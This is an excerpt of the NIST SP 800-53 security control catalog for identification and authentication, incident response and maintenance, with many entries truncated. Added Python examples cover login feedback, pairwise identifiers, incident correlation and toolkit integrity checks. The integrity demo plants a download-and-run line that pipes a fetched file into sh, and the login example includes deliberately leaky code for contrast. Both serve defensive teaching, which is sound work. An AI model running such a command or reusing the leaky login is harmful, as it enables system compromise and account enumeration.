IA-6 Authentication Feedback
Control Text: Obscure feedback of authentication information during the authentication process to protect the inf…
Discussion: Authentication feedback from systems does not provide information that would allow unauthorized individuals to compromise authentication mechanisms. For some types of systems, such as desktops or no…
Related Controls: AC-3.

IA-7 Cryptographic Module Authentication
Control Text: Implement mechanisms for authentication to a cryptographic module that meet the requirements of appl…
Discussion: Authentication mechanisms may be required within a cryptographic module to authenticate an operato…
Related Controls: AC-3, IA-5, SA-4, SC-12, SC-13.
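An added example for IA-6 above (not code from the catalog or from NIST): the two usual ways a login leaks authentication information are a failure message that distinguishes an unknown username from a wrong password, and a fast path for unknown users that reveals the same fact through response time. The leaky version is shown beside a hardened one that returns a single message, hashes against a dummy record when the account does not exist, and compares digests in constant time. The user store, password, PBKDF2 parameters and function names are assumptions for the example.

```python
import hashlib
import hmac
import os
import secrets

# Constructed user store for the example: salted PBKDF2 digests only.
# The account, password and iteration count are assumptions, not catalog values.
ALICE_PASSWORD = "correct horse battery staple"
ITERATIONS = 100_000
GENERIC_FAILURE = "invalid username or password"


def derive(password: str, salt: bytes) -> bytes:
    """Salted, iterated password digest (PBKDF2-HMAC-SHA256)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


_alice_salt = os.urandom(16)
USERS = {"alice": (_alice_salt, derive(ALICE_PASSWORD, _alice_salt))}

# A dummy record used for unknown usernames so the hardened path does the
# same amount of work whether or not the account exists.
_DUMMY_SALT = os.urandom(16)
_DUMMY_DIGEST = derive(secrets.token_hex(16), _DUMMY_SALT)


def login_leaky(username: str, password: str) -> str:
    """Feedback IA-6 is meant to prevent: the message reveals whether the
    account exists, and an unknown user returns immediately (no hashing), so
    the response time leaks the same fact even if the messages were identical."""
    if username not in USERS:
        return "unknown user"
    salt, digest = USERS[username]
    if derive(password, salt) != digest:   # also a non-constant-time compare
        return "wrong password"
    return "ok"


def login_hardened(username: str, password: str) -> str:
    """Obscured feedback: one message for every failure, the same PBKDF2 work
    for unknown and known accounts, and a constant-time digest comparison."""
    salt, digest = USERS.get(username, (_DUMMY_SALT, _DUMMY_DIGEST))
    candidate = derive(password, salt)
    matched = hmac.compare_digest(candidate, digest)
    if username in USERS and matched:
        return "ok"
    return GENERIC_FAILURE
```

The same principle applies to lockout counters and password-reset flows: a "no such account" branch anywhere in the chain gives the enumeration back, so every branch should cost the same and say the same thing.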
IA-8 Identification and Authentication (non-organizational Users)
Control Text: Uniquely identify and authenticate non-organizational users or processes acting on behalf of non-org…
Discussion: Non-organizational users include system users other than organizational users explicitly covered by I…
Related Controls: AC-2, AC-6, AC-14, AC-17, AC-18, AU-6, IA-2, IA-4, IA-5, IA-10, IA-11, MA-4, RA-3, SA-4, SC-8.

IA-8(1) Identification and Authentication (non-organizational Users) | Acceptance of PIV Credentials from O…
Control Text: Accept and electronically verify Personal Identity Verification-compliant credentials from other federa…
Discussion: Acceptance of Personal Identity Verification (PIV) credentials from other federal agencies applies to…
Related Controls: PE-3.

IA-8(2) Identification and Authentication (non-organizational Users) | Acceptance of External Authenticators
Control Text: (a) Accept only external authenticators that are NIST-compliant; and (b) Document and maintain a list of accepted external authenticators.
Discussion: Acceptance of only NIST-compliant external authenticators applies to organizational systems that are accessible to the public (e.g., public-facing websites). External authenticators are issued by nonfederal government entities and are compliant with SP 800-63B. Approved external authenticators meet or exceed the minimum Federal Government-wide technical, security, privacy,…
Related Controls: None.

IA-8(3) Identification and Authentication (non-organizational Users) | Use of FICAM-approved Products
Control Text: [Withdrawn: Incorporated into IA-8(2).]

IA-8(4) Identification and Authentication (non-organizational Users) | Use of Defined Profiles
Control Text: Conform to the following profiles for identity management [Assignment: organization-defined identity management profiles].
Discussion: Organizations define profiles for identity management based on open identity management standards. To ensure that open identity management standards are viable, robust, reliable, sustainable, and interoperable as documented, the Federal Government assesses and scopes the standards and technology implementations against applicable laws, executive orders, directives, and…
Related Controls: None.

IA-8(5) Identification and Authentication (non-organizational Users) | Acceptance of PIV-I Credentials
Control Text: Accept and verify federated or PKI credentials that meet [Assignment: organization-defined policy].
Discussion: Acceptance of PIV-I credentials can be implemented by PIV, PIV-I, and other commercial or external identity providers. The acceptance and verification of PIV-I-compliant credentials apply to both logical and physical access control systems. The acceptance and verification of PIV-I credentials address nonfederal issuers of identity cards that desire to interoperate with United States…
Related Controls: None.

IA-8(6) Identification and Authentication (non-organizational Users) | Disassociability
Control Text: Implement the following measures to disassociate user attributes or identifier assertion relationships among individuals, credential service providers, and relying parties: [Assignment: organization-defined measures].
Discussion: Federated identity solutions can create increased privacy risks due to the tracking and profiling of individuals. Using identifier mapping tables or cryptographic techniques to blind credential service providers and relying parties from each other or to make identity attributes less visible to transmitting parties can reduce these privacy risks.
Related Controls: None.

IA-9 Service Identification and Authentication
Control Text: Uniquely identify and authenticate [Assignment: organization-defined system services and application…
Discussion: Services that may require identification and authentication include web applications using digital cert…
Related Controls: IA-3, IA-4, IA-5, SC-8.

IA-9(1) Service Identification and Authentication | Information Exchange
Control Text: [Withdrawn: Incorporated into IA-9.]

IA-9(2) Service Identification and Authentication | Transmission of Decisions
Control Text: [Withdrawn: Incorporated into IA-9.]
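The identifier-mapping-table and cryptographic-blinding techniques that IA-8(6) above names, as an added example (not code from the catalog or from NIST): a toy credential service provider (CSP) gives each relying party (RP) its own pairwise subject identifier, either an HMAC of (account, RP) under a CSP secret or a random pseudonym kept in a mapping table, and releases only the attributes agreed for that RP. Two RPs that pool their records cannot join them on the subject, and neither ever sees the CSP's internal account identifier. The CSP key, the RP names, the accounts and the release policy are assumptions for the example.

```python
import base64
import hashlib
import hmac
import secrets

# Added example of a pairwise-pseudonymous CSP. Nothing here is a real
# identity provider; key, accounts, RP names and policy are constructed.

PAIRWISE_KEY = secrets.token_bytes(32)   # CSP-held secret; losing it breaks stability, leaking it breaks unlinkability

# Attribute release policy per RP: assumed to have been agreed out of band.
RELEASE_POLICY = {
    "payroll.example": {"given_name", "employee_id"},
    "benefits.example": {"given_name"},
}

# Internal account store (constructed). The internal id must never reach an RP.
ACCOUNTS = {
    "acct-0001": {"given_name": "Alice", "employee_id": "E-1001", "ssn_last4": "1234"},
    "acct-0002": {"given_name": "Bob", "employee_id": "E-1002", "ssn_last4": "5678"},
}


def pairwise_subject(internal_id: str, rp_id: str, key: bytes = PAIRWISE_KEY) -> str:
    """Cryptographic technique: HMAC over (account, RP) under the CSP secret.
    Stable for one account at one RP; unlinkable across RPs without the key."""
    mac = hmac.new(key, f"{internal_id}\x00{rp_id}".encode(), hashlib.sha256).digest()
    return base64.urlsafe_b64encode(mac[:16]).rstrip(b"=").decode()


_mapping_table: dict = {}


def mapping_table_subject(internal_id: str, rp_id: str) -> str:
    """Identifier-mapping-table technique: a random pseudonym minted on first
    use and stored under (account, RP). Same unlinkability, but the CSP must
    persist and protect the table instead of one key."""
    slot = (internal_id, rp_id)
    if slot not in _mapping_table:
        _mapping_table[slot] = secrets.token_urlsafe(12)
    return _mapping_table[slot]


def issue_assertion(internal_id: str, rp_id: str, requested: set) -> dict:
    """What the RP receives: a pairwise subject plus only the attributes the
    release policy allows; requested-but-unapproved attributes are dropped."""
    attrs = ACCOUNTS[internal_id]
    allowed = RELEASE_POLICY.get(rp_id, set())
    released = {k: attrs[k] for k in requested & allowed}
    return {"sub": pairwise_subject(internal_id, rp_id), "aud": rp_id, **released}


def linkable(assertion_a: dict, assertion_b: dict) -> bool:
    """What colluding RPs can do with assertions alone: join on 'sub'."""
    return assertion_a["sub"] == assertion_b["sub"]
```

Pairwise identifiers only blind the RPs from each other; blinding the CSP from the RPs (so the CSP does not learn which services a person uses) needs a broker or proxy in between, which is the other half of what IA-8(6) allows organizations to define.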
IA-10 Adaptive Authentication
Control Text: Require individuals accessing the system to employ [Assignment: organization-defined supplemental…
Discussion: Adversaries may compromise individual authentication mechanisms employed by organizations and subseq…
Related Controls: IA-2, IA-8.

IA-11 Re-authentication
Control Text: Require users to re-authenticate when [Assignment: organization-defined circumstances or situations…
Discussion: In addition to the re-authentication requirements associated with device locks, organizations may requ…
Related Controls: AC-3, AC-11, IA-2, IA-3, IA-4, IA-8.
IA-12 Identity Proofing
Control Text: a. Identity proof users that require accounts for logical access to systems based on appropriate identity assurance level requirements as specified in applicable standards and guidelines;
Discussion: Identity proofing is the process of collecting, validating, and verifying a user’s identity information…
Related Controls: AC-5, IA-1, IA-2, IA-3, IA-4, IA-5, IA-6, IA-8.

IA-12(1) Identity Proofing | Supervisor Authorization
Control Text: Require that the registration process to receive an account for logical access includes supervisor or sponsor authorization.
Discussion: Including supervisor or sponsor authorization as part of the registration process provides an additional level of scrutiny to ensure that the user’s management chain is aware of the account, the account is essential to carry out organizational missions and functions, and the user’s privileges are appropriate for the anticipated responsibilities and authorities within the organization.
Related Controls: None.

IA-12(2) Identity Proofing | Identity Evidence
Control Text: Require evidence of individual identification be presented to the registration authority.
Discussion: Identity evidence, such as documentary evidence or a combination of documents and biometrics, reduces the likelihood of individuals using fraudulent identification to establish an identity or at least increases the work factor of potential adversaries. The forms of acceptable evidence are consistent with the risks to the systems, roles, and privileges associated with the user’s account.
Related Controls: None.

IA-12(3) Identity Proofing | Identity Evidence Validation and Verification
Control Text: Require that the presented identity evidence be validated and verified through [Assignment: organizational defined methods of validation and verification].
Discussion: Validation and verification of identity evidence increases the assurance that accounts and identifiers are being established for the correct user and authenticators are being bound to that user. Validation refers to the process of confirming that the evidence is genuine and authentic, and the data contained in the evidence is correct, current, and related to an individual. Verification pr…
Related Controls: None.

IA-12(4) Identity Proofing | In-person Validation and Verification
Control Text: Require that the validation and verification of identity evidence be conducted in person before a designated registration authority.
Discussion: In-person proofing reduces the likelihood of fraudulent credentials being issued because it requires the physical presence of individuals, the presentation of physical identity documents, and actual face-to-face interactions with designated registration authorities.
Related Controls: None.

IA-12(5) Identity Proofing | Address Confirmation
Control Text: Require that a [Selection: registration code; notice of proofing] be delivered through an out-of-band ch…
Discussion: To make it more difficult for adversaries to pose as legitimate users during the identity proofing pr…
Related Controls: IA-12.

IA-12(6) Identity Proofing | Accept Externally-proofed Identities
Control Text: Accept externally-proofed identities at [Assignment: organization-defined identity assurance level].
Discussion: To limit unnecessary re-proofing of identities, particularly of non-PIV users, organizations accept p…
Related Controls: IA-3, IA-4, IA-5, IA-8.
IR-1 Policy and Procedures
Control Text: a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: 1. [Selection (one or more): Organization-level; Mission/business process-level; System-level] incident response policy that:
Discussion: Incident response policy and procedures address the controls in the IR family that are implemented wi…
Related Controls: PM-9, PS-8, SI-12.

IR-2 Incident Response Training
Control Text: a. Provide incident response training to system users consistent with assigned roles and responsibilities:
Discussion: Incident response training is associated with the assigned roles and responsibilities of organizational personnel to ensure that the appropriate content and level of detail are included in such training. For exam…
Related Controls: AT-2, AT-3, AT-4, CP-3, IR-3, IR-4, IR-8, IR-9.

IR-2(1) Incident Response Training | Simulated Events
Control Text: Incorporate simulated events into incident response training to facilitate the required response by personnel in crisis situations.
Discussion: Organizations establish requirements for responding to incidents in incident response plans. Incorporating simulated events into incident response training helps to ensure that personnel understand their individual responsibilities and what specific actions to take in crisis situations.
Related Controls: None.

IR-2(2) Incident Response Training | Automated Training Environments
Control Text: Provide an incident response training environment using [Assignment: organization-defined automated mechanisms].
Discussion: Automated mechanisms can provide a more thorough and realistic incident response training environment. This can be accomplished, for example, by providing more complete coverage of incident response issues, selecting more realistic training scenarios and environments, and stressing the response capability.
Related Controls: None.

IR-2(3) Incident Response Training | Breach
Control Text: Provide incident response training on how to identify and respond to a breach, including the organization’s process for reporting a breach.
Discussion: For federal agencies, an incident that involves personally identifiable information is considered a breach. A breach results in the loss of control, compromise, unauthorized disclosure, unauthorized acquisition, or a similar occurrence where a person other than an authorized user accesses or potentially accesses personally identifiable information or an authorized user accesses or…
Related Controls: None.

IR-3 Incident Response Testing
Control Text: Test the effectiveness of the incident response capability for the system [Assignment: organization-de…
Discussion: Organizations test incident response capabilities to determine their effectiveness and identify potenti…
Related Controls: CP-3, CP-4, IR-2, IR-4, IR-8, PM-14.

IR-3(1) Incident Response Testing | Automated Testing
Control Text: Test the incident response capability using [Assignment: organization-defined automated mechanisms].
Discussion: Organizations use automated mechanisms to more thoroughly and effectively test incident response capabilities. This can be accomplished by providing more complete coverage of incident response issues, selecting realistic test scenarios and environments, and stressing the response capability.
Related Controls: None.

IR-3(2) Incident Response Testing | Coordination with Related Plans
Control Text: Coordinate incident response testing with organizational elements responsible for related plans.
Discussion: Organizational plans related to incident response testing include business continuity plans, disaster recovery plans, continuity of operations plans, contingency plans, crisis communications plans, critical infrastructure plans, and occupant emergency plans.
Related Controls: None.

IR-3(3) Incident Response Testing | Continuous Improvement
Control Text: Use qualitative and quantitative data from testing to: (a) Determine the effectiveness of incident response processes;
Discussion: To help incident response activities function as intended, organizations may use metrics and evaluation criteria to assess incident response programs as part of an effort to continually improve response performance. These efforts facilitate improvement in incident response efficacy and lessen the impact of incidents.
Related Controls: None.
IR-4 Incident Handling
Control Text: a. Implement an incident handling capability for incidents that is consistent with the incident response plan and includes preparation, detection and analysis, containment, eradication, and recovery;
Discussion: Organizations recognize that incident response capabilities are dependent on the capabilities of orga…
Related Controls: AC-19, AU-6, AU-7, CM-6, CP-2, CP-3, CP-4, IR-2, IR-3, IR-5, IR-6, IR-8, PE-6, PL-2, PM-12, SA-8, SC-5, SC-7, SI-3, SI-4, SI-7.

IR-4(1) Incident Handling | Automated Incident Handling Processes
Control Text: Support the incident handling process using [Assignment: organization-defined automated mechanisms].
Discussion: Automated mechanisms that support incident handling processes include online incident management systems and tools that support the collection of live response data, full network packet capture, and forensic analysis.
Related Controls: None.

IR-4(2) Incident Handling | Dynamic Reconfiguration
Control Text: Include the following types of dynamic reconfiguration for [Assignment: organization-defined system…
Discussion: Dynamic reconfiguration includes changes to router rules, access control lists, intrusion detection or…
Related Controls: AC-2, AC-4, CM-2.
IR-4(3) Incident Handling | Continuity of Operations
Control Text: Identify [Assignment: organization-defined classes of incidents] and take the following actions in response to those incidents to ensure continuation of organizational mission and business functions: [Assignment: organization-defined actions to take in response to classes of incidents].
Discussion: Classes of incidents include malfunctions due to design or implementation errors and omissions, targeted malicious attacks, and untargeted malicious attacks. Incident response actions include orderly system degradation, system shutdown, fall back to manual mode or activation of alternative technology whereby the system operates differently, employing deceptive measures, alternate information…
Related Controls: None.

IR-4(4) Incident Handling | Information Correlation
Control Text: Correlate incident information and individual incident responses to achieve an organization-wide perspective on incident awareness and response.
Discussion: Sometimes, a threat event, such as a hostile cyber-attack, can only be observed by bringing together information from different sources, including various reports and reporting procedures established by organizations.
Related Controls: None.

IR-4(5) Incident Handling | Automatic Disabling of System
Control Text: Implement a configurable capability to automatically disable the system if [Assignment: organization-defined security violations] are detected.
Discussion: Organizations consider whether the capability to automatically disable the system conflicts with continuity of operations requirements specified as part of CP-2 or IR-4(3). Security violations include cyber-attacks that have compromised the integrity of the system or exfiltrated organizational information and serious errors in software programs that could adversely impact organizational…
Related Controls: None.

IR-4(6) Incident Handling | Insider Threats
Control Text: Implement an incident handling capability for incidents involving insider threats.
Discussion: Explicit focus on handling incidents involving insider threats provides additional emphasis on this type of threat and the need for specific incident handling capabilities to provide appropriate and timely responses.
Related Controls: None.

IR-4(7) Incident Handling | Insider Threats — Intra-organization Coordination
Control Text: Coordinate an incident handling capability for insider threats that includes the following organizational entities [Assignment: organization-defined entities].
Discussion: Incident handling for insider threat incidents (e.g., preparation, detection and analysis, containment, eradication, and recovery) requires coordination among many organizational entities, including mission or business owners, system owners, human resources offices, procurement offices, personnel offices, physical security offices, senior agency information security officer,…
Related Controls: None.

IR-4(8) Incident Handling | Correlation with External Organizations
Control Text: Coordinate with [Assignment: organization-defined external organizations] to correlate and share [A…
Discussion: The coordination of incident information with external organizations—including mission or business pa…
Related Controls: AU-16, PM-16.

IR-4(9) Incident Handling | Dynamic Response Capability
Control Text: Employ [Assignment: organization-defined dynamic response capabilities] to respond to incidents.
Discussion: The dynamic response capability addresses the timely deployment of new or replacement organizational capabilities in response to incidents. This includes capabilities implemented at the mission and business process level and at the system level.
Related Controls: None.

IR-4(10) Incident Handling | Supply Chain Coordination
Control Text: Coordinate incident handling activities involving supply chain events with other organizations involve…
Discussion: Organizations involved in supply chain activities include product developers, system integrators, ma…
Related Controls: CA-3, MA-2, SA-9, SR-8.
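An added example of the cross-source correlation IR-4(4) above describes (not code from the catalog or from NIST): events from an IDS, an authentication log and an endpoint agent are grouped per host, chained when each falls within a time window of the previous one, and reported as one incident only when more than one independent source saw that host. A beacon alert alone, or a burst of failed logins alone, stays an alert; together on one host within minutes they become an incident. The sample lines, field names and host names are constructed for the example.

```python
import shlex
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events from three separate sources (an IDS, an
# authentication log and an endpoint agent). Made-up lines, not real
# telemetry; the field names and host names are assumptions.
SAMPLE_EVENTS = [
    '2024-03-01T09:58:02Z ids host=ws-042 sig="ET TROJAN Beacon" dst=203.0.113.9',
    '2024-03-01T10:01:15Z auth host=ws-042 user=jdoe result=fail',
    '2024-03-01T10:01:20Z auth host=ws-042 user=jdoe result=fail',
    '2024-03-01T10:01:27Z auth host=ws-042 user=jdoe result=success',
    '2024-03-01T10:03:40Z edr host=ws-042 proc=powershell.exe parent=winword.exe',
    '2024-03-01T14:20:00Z auth host=db-01 user=svc_backup result=success',
    '2024-03-01T16:45:10Z ids host=fs-07 sig="ET SCAN Nmap" dst=10.0.0.5',
]


def parse_event(line: str) -> dict:
    """'<iso-timestamp> <source> k=v k="v v" ...' -> dict with ts, source and fields."""
    ts, source, rest = line.split(" ", 2)
    fields = dict(tok.split("=", 1) for tok in shlex.split(rest))
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "source": source, **fields}


def _summarize(host: str, cluster: list, min_sources: int) -> list:
    sources = {e["source"] for e in cluster}
    if len(sources) < min_sources:
        return []          # one source alone is an alert, not yet a correlated incident
    return [{
        "host": host,
        "sources": sorted(sources),
        "start": cluster[0]["ts"],
        "end": cluster[-1]["ts"],
        "events": len(cluster),
    }]


def correlate(lines, window=timedelta(minutes=15), min_sources=2) -> list:
    """Group events per host, chain each event to the previous one when the
    gap is within `window`, and keep chains seen by at least `min_sources`
    independent sources: the organization-wide view IR-4(4) asks for."""
    by_host = defaultdict(list)
    for ev in map(parse_event, lines):
        by_host[ev["host"]].append(ev)

    incidents = []
    for host, events in by_host.items():
        events.sort(key=lambda e: e["ts"])
        cluster = [events[0]]
        for ev in events[1:]:
            if ev["ts"] - cluster[-1]["ts"] <= window:
                cluster.append(ev)
            else:
                incidents.extend(_summarize(host, cluster, min_sources))
                cluster = [ev]
        incidents.extend(_summarize(host, cluster, min_sources))
    return incidents
```

Host is the join key here because it is present in all three sources; in practice the same chaining is run on user, source address and process lineage as well, and the window is tuned per source pair.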
IR-4(11) Incident Handling | Integrated Incident Response Team
Control Text: Establish and maintain an integrated incident response team that can be deployed to any location ide…
Discussion: An integrated incident response team is a team of experts that assesses, documents, and responds to incidents so that organizational systems and networks can recover quickly and implement the necessary controls to avoid future incidents. Incident response team personnel include forensic and malicious code analysts, tool developers, systems security and privacy engineers, and real-time…
Related Controls: AT-3.

IR-4(12) Incident Handling | Malicious Code and Forensic Analysis
Control Text: Analyze malicious code and/or other residual artifacts remaining in the system after the incident.
Discussion: When conducted carefully in an isolated environment, analysis of malicious code and other residual artifacts of a security incident can give the organization insight into adversary tactics, techniques, and procedures. It can also indicate the identity or some defining characteristics of the adversary. In addition, malicious code analysis can help the organization develop responses to incidents.
Related Controls: None.

IR-4(13) Incident Handling | Behavior Analysis
Control Text: Analyze anomalous or suspected adversarial behavior in or related to [Assignment: organization-defined environments or resources].
Discussion: If the organization maintains a deception environment, an analysis of behaviors in that environment, including resources targeted by the adversary and timing of the incident or event, can provide insight into adversarial tactics, techniques, and procedures. External to a deception environment, the analysis of anomalous adversarial behavior (e.g., changes in system performance…
Related Controls: None.

IR-4(14) Incident Handling | Security Operations Center
Control Text: Establish and maintain a security operations center.
Discussion: A security operations center (SOC) is the focal point for security operations and computer network defense for an organization. The purpose of the SOC is to defend and monitor an organization’s systems and networks (i.e., cyber infrastructure) on an ongoing basis. The SOC is also responsible for detecting, analyzing, and responding to cybersecurity incidents in a timely manner. The…
Related Controls: None.

IR-4(15) Incident Handling | Public Relations and Reputation Repair
Control Text: (a) Manage public relations associated with an incident; and (b) Employ measures to repair the reputation of the organization.
Discussion: It is important for an organization to have a strategy in place for addressing incidents that have been brought to the attention of the general public, have cast the organization in a negative light, or have affected the organization’s constituents (e.g., partners, customers). Such publicity can be extremely harmful to the organization and affect its ability to carry out its mission and business…
Related Controls: None.

IR-5 Incident Monitoring
Control Text: Track and document incidents.
Discussion: Documenting incidents includes maintaining records about each incident, the status of the incident,…
Related Controls: AU-6, AU-7, IR-4, IR-6, IR-8, PE-6, PM-5, SC-5, SC-7, SI-3, SI-4, SI-7.

IR-5(1) Incident Monitoring | Automated Tracking, Data Collection, and Analysis
Control Text: Track incidents and collect and analyze incident information using [Assignment: organization-defined automated mechanisms].
Discussion: Automated mechanisms for tracking incidents and collecting and analyzing incident information include Computer Incident Response Centers or other electronic databases of incidents and network monitoring devices.
Related Controls: None.

IR-6 Incident Reporting
Control Text: a. Require personnel to report suspected incidents to the organizational incident response capability within [Assignment: organization-defined time period]; and
Discussion: The types of incidents reported, the content and timeliness of the reports, and the designated reportin…
Related Controls: CM-6, CP-2, IR-4, IR-5, IR-8, IR-9.
IR-6(1) Incident Reporting | Automated Reporting
Control Text: Report incidents using [Assignment: organization-defined automated mechanisms].
Discussion: The recipients of incident reports are specified in IR-6b. Automated reporting mechanisms include e…
Related Controls: IR-7.

IR-6(2) Incident Reporting | Vulnerabilities Related to Incidents
Control Text: Report system vulnerabilities associated with reported incidents to [Assignment: organization-defined personnel or roles].
Discussion: Reported incidents that uncover system vulnerabilities are analyzed by organizational personnel including system owners, mission and business owners, senior agency information security officers, senior agency officials for privacy, authorizing officials, and the risk executive (function). The analysis can serve to prioritize and initiate mitigation actions to address the discovered system…
Related Controls: None.

IR-6(3) Incident Reporting | Supply Chain Coordination
Control Text: Provide incident information to the provider of the product or service and other organizations invol…
Discussion: Organizations involved in supply chain activities include product developers, system integrators, man…
Related Controls: SR-8.

IR-7 Incident Response Assistance
Control Text: Provide an incident response support resource, integral to the organizational incident response capabil…
Discussion: Incident response support resources provided by organizations include help desks, assistance groups,…
Related Controls: AT-2, AT-3, IR-4, IR-6, IR-8, PM-22, PM-26, SA-9, SI-18.

IR-7(1) Incident Response Assistance | Automation Support for Availability of Information and Support
Control Text: Increase the availability of incident response information and support using [Assignment: organization-defined automated mechanisms].
Discussion: Automated mechanisms can provide a push or pull capability for users to obtain incident response assistance. For example, individuals may have access to a website to query the assistance capability, or the assistance capability can proactively send incident response information to users (general distribution or targeted) as part of increasing understanding of current response capabilities…
Related Controls: None.

IR-7(2) Incident Response Assistance | Coordination with External Providers
Control Text: (a) Establish a direct, cooperative relationship between its incident response capability and external providers of system protection capability; and
Discussion: External providers of a system protection capability include the Computer Network Defense program within the U.S. Department of Defense. External providers help to protect, monitor, analyze, detect, and respond to unauthorized activity within organizational information systems and networks. It may be beneficial to have agreements in place with external providers to clarify…
Related Controls: None.

IR-8 Incident Response Plan
Control Text: a. Develop an incident response plan that: 1. Provides the organization with a roadmap for implementing its incident response capability;
Discussion: It is important that organizations develop and implement a coordinated approach to incident response.
Related Controls: AC-2, CP-2, CP-4, IR-4, IR-7, IR-9, PE-6, PL-2, SA-15, SI-12, SR-8.

IR-8(1) Incident Response Plan | Breaches
Control Text: Include the following in the Incident Response Plan for breaches involving personally identifiable information:
Discussion: Organizations may be required by law, regulation, or policy to follow specific procedures relating to…
Related Controls: PT-1, PT-2, PT-3, PT-4, PT-5, PT-7.

IR-9 Information Spillage Response
Control Text: Respond to information spills by: a. Assigning [Assignment: organization-defined personnel or roles] with responsibility for responding to information spills;
Discussion: Information spillage refers to instances where information is placed on systems that are not authorize…
Related Controls: CP-2, IR-6, PM-26, PM-27, PT-2, PT-3, PT-7, RA-7.

IR-10 Integrated Information Security Analysis Team
Control Text: [Withdrawn: Moved to IR-4(11).]
IR-9(2) Information Spillage Response | Training
Control Text: Provide information spillage response training [Assignment: organization-defined frequency].
Discussion: Organizations establish requirements for responding to information spillage incidents in incident resp…
Related Controls: AT-2, AT-3, CP-3, IR-2.

IR-9(3) Information Spillage Response | Post-spill Operations
Control Text: Implement the following procedures to ensure that organizational personnel impacted by information spills can continue to carry out assigned tasks while contaminated systems are undergoing corrective actions: [Assignment: organization-defined procedures].
Discussion: Corrective actions for systems contaminated due to information spillages may be time-consuming. Personnel may not have access to the contaminated systems while corrective actions are being taken, which may potentially affect their ability to conduct organizational business.
Related Controls: None.

IR-9(4) Information Spillage Response | Exposure to Unauthorized Personnel
Control Text: Employ the following controls for personnel exposed to information not within assigned access authorizations: [Assignment: organization-defined controls].
Discussion: Controls include ensuring that personnel who are exposed to spilled information are made aware of the laws, executive orders, directives, regulations, policies, standards, and guidelines regarding the information and the restrictions imposed based on exposure to such information.
Related Controls: None.

IR-9(1) Information Spillage Response | Responsible Personnel
Control Text: [Withdrawn: Incorporated into IR-9.]
MA-1 Policy and Procedures
Control Text: a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: 1. [Selection (one or more): Organization-level; Mission/business process-level; System-level] maintenance policy that:
Discussion: Maintenance policy and procedures address the controls in the MA family that are implemented within s…
Related Controls: PM-9, PS-8, SI-12.

MA-2 Controlled Maintenance
Control Text: a. Schedule, document, and review records of maintenance, repair, and replacement on system components in accordance with manufacturer or vendor specifications and/or organizational requirements;
Discussion: Controlling system maintenance addresses the information security aspects of the system maintenanc…
Related Controls: CM-2, CM-3, CM-4, CM-5, CM-8, MA-4, MP-6, PE-16, SI-2, SR-3, SR-4, SR-11.

MA-2(1) Controlled Maintenance | Record Content
Control Text: [Withdrawn: Incorporated into MA-2.]

MA-2(2) Controlled Maintenance | Automated Maintenance Activities
Control Text: (a) Schedule, conduct, and document maintenance, repair, and replacement actions for the system using [Assignment: organization-defined automated mechanisms]; and
Discussion: The use of automated mechanisms to manage and control system maintenance programs and activities…
Related Controls: MA-3.

MA-3 Maintenance Tools
Control Text: a. Approve, control, and monitor the use of system maintenance tools; and b. Review previously approved system maintenance tools [Assignment: organization-defined frequency].
Discussion: Approving, controlling, monitoring, and reviewing maintenance tools address security-related issues…
Related Controls: MA-2, PE-16.

MA-3(1) Maintenance Tools | Inspect Tools
Control Text: Inspect the maintenance tools used by maintenance personnel for improper or unauthorized modific…
Discussion: Maintenance tools can be directly brought into a facility by maintenance personnel or downloaded fro…
Related Controls: SI-7.
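An added example for MA-3(1) above (not code from the catalog or from NIST): a maintenance toolkit is checked against an approved SHA-256 manifest before use, and anything modified, missing or unlisted is reported so the toolkit can be rejected. The toolkit, file names, manifest and the tampering shown are all constructed for the demo; the manifest stands in for the SI-7 integrity baseline a real program would keep, signed and stored apart from the tools.

```python
import hashlib
import tempfile
from pathlib import Path

# Added example: inspecting a maintenance toolkit against an approved hash
# manifest. Toolkit, file names and manifest are constructed for the demo.


def sha256_file(path: Path) -> str:
    """Streamed SHA-256 so large tool images are not read into memory at once."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def inspect_tools(tool_dir: Path, manifest: dict) -> dict:
    """Compare every file under tool_dir with the approved manifest
    ({relative path: sha256 hex}). 'modified' is an altered approved tool,
    'unapproved' a file nobody approved, 'missing' an approved file that is
    absent; any of the three is grounds to refuse the toolkit."""
    found = {
        str(p.relative_to(tool_dir)): sha256_file(p)
        for p in sorted(tool_dir.rglob("*")) if p.is_file()
    }
    report = {"ok": [], "modified": [], "missing": [], "unapproved": []}
    for name, approved in manifest.items():
        if name not in found:
            report["missing"].append(name)
        elif found[name] == approved:
            report["ok"].append(name)
        else:
            report["modified"].append(name)
    report["unapproved"] = [n for n in found if n not in manifest]
    return report


def build_demo_toolkit():
    """Create a throwaway toolkit, record its approved hashes, then alter it
    the way an unauthorized modification would (constructed scenario)."""
    d = Path(tempfile.mkdtemp(prefix="tools-"))
    (d / "diag.sh").write_bytes(b"#!/bin/sh\necho diagnostics\n")
    (d / "flash.bin").write_bytes(bytes(range(64)))
    manifest = {
        "diag.sh": sha256_file(d / "diag.sh"),
        "flash.bin": sha256_file(d / "flash.bin"),
        "vendor.cfg": "0" * 64,   # approved but not shipped in this kit
    }
    # Tampering: a download-and-run line appended to the script, plus an
    # unlisted binary dropped into the kit. 203.0.113.5 is a documentation address.
    (d / "diag.sh").write_bytes(
        b"#!/bin/sh\necho diagnostics\ncurl -s http://203.0.113.5/x | sh\n")
    (d / "extra.exe").write_bytes(b"MZ" + bytes(62))
    return d, manifest


def demo() -> dict:
    """Build the tampered kit and inspect it."""
    tool_dir, manifest = build_demo_toolkit()
    return inspect_tools(tool_dir, manifest)
```

The check is only as good as the manifest's provenance: hashes copied from the same USB stick as the tools prove nothing, which is why the approved list belongs with the MA-3 review records rather than with the kit.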
MA-3(2) Maintenance Tools | Inspect Media
Control Text: Check media containing diagnostic and test programs for malicious code before the media are used i…
Discussion: If, upon inspection of media containing maintenance, diagnostic, and test programs, organizations de…
Related Controls: SI-3.

MA-3(3) Maintenance Tools | Prevent Unauthorized Removal
Control Text: Prevent the removal of maintenance equipment containing organizational information by: (a) Verifying that there is no organizational information contained on the equipment;
Discussion: Organizational information includes all information owned by organizations and any information prov…
Related Controls: MP-6.

MA-3(4) Maintenance Tools | Restricted Tool Use
Control Text: Restrict the use of maintenance tools to authorized personnel only.
